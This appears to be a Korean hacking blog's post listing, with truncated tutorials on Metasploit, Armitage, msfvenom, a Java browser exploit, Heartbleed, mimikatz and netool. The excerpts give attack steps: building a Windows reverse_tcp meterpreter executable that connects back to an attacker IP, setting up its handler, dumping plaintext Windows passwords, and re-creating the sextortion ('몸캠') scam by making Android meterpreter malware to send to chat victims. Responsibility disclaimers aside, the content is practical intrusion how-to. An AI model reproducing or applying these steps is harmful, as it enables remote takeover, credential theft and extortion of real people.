Lucete

Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - 빠르고 다양한 payloads, 파워셸과 바이러스 공격을 위한 툴킷 https://github.com/screetsec/brutal

모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다. 다음은 service postgresql start 명령어를 실행시킨 후 service metasploit start 를 실행해준다. 다음은 armitage를 실행시킨다. 이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면 이러한 창이 뜬다. tab창에서 hosts -> add hosts 를 누르면 이렇게 victim IP를 입력할 수있도록 뜬다. 등록후 OS 를 알아보자 다시 host 탭에서 nmap scan -> quick scan(os detect)를 클릭하고 yes 그럼 콘솔창에 이러한 것을 확인할수 있다. 이제 취약점을 이용하여 공격하기 위해 어떠한..

모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP..

모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지..

heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다. heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다. 취약점을 실습해볼 때에는 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c여기서 다운을 받은 후 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 ..

mimikatz는 windows 계정을 알아내기 위한 도구이다. https://github.com/gentilkiwi/mimikatz 위에서 mimikatz를 다운받은 후 cmd 를 이용 하여 mimikatz 폴더 까지 이동을 한다. (폴더에서 실행 파일로 실행 해도 된다.) 이동을 하고 dir 을 확인해보면 mimikatz.exe라는 파일을 실행 시킨다. 실행을 시키면 밑에처럼 이러한 리눅스 형식으로 바뀐다. 먼저 privilege::debug 명령어를 실행 하여 준비를 한다.만약 에러가 뜬다면 관리자 권한으로 실행 시켜주면 된다 :) 다음은 sekurlsa::logonpasswords 명령을 내려 계정에 대한 정보를 평문으로 뽑아낸다.password 또한 이곳에서 출력된다. XP, 2003, Vist..

netool = script project 넷툴을 설치하기 위해 https://sourceforge.net/projects/netoolsh/ 들어가면 밑에와 같은 창이 뜬다. :) Git -> opensource-kali 를 클릭하게 되면 밑으로 쭉쭉 내리면 설치방법이 뜬당 :) 자세한건 유튜브로

요즘 몸캠이 유행을 했었다. 대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.) 그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :) 이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X 먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgresql 또한 시킨다. 궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다. 그 후 이제 악성코드를 만들어야 하는데...명령어 msfvenom을 이용 하여 만들어 보자.msfvenom -p android/meterpreter/..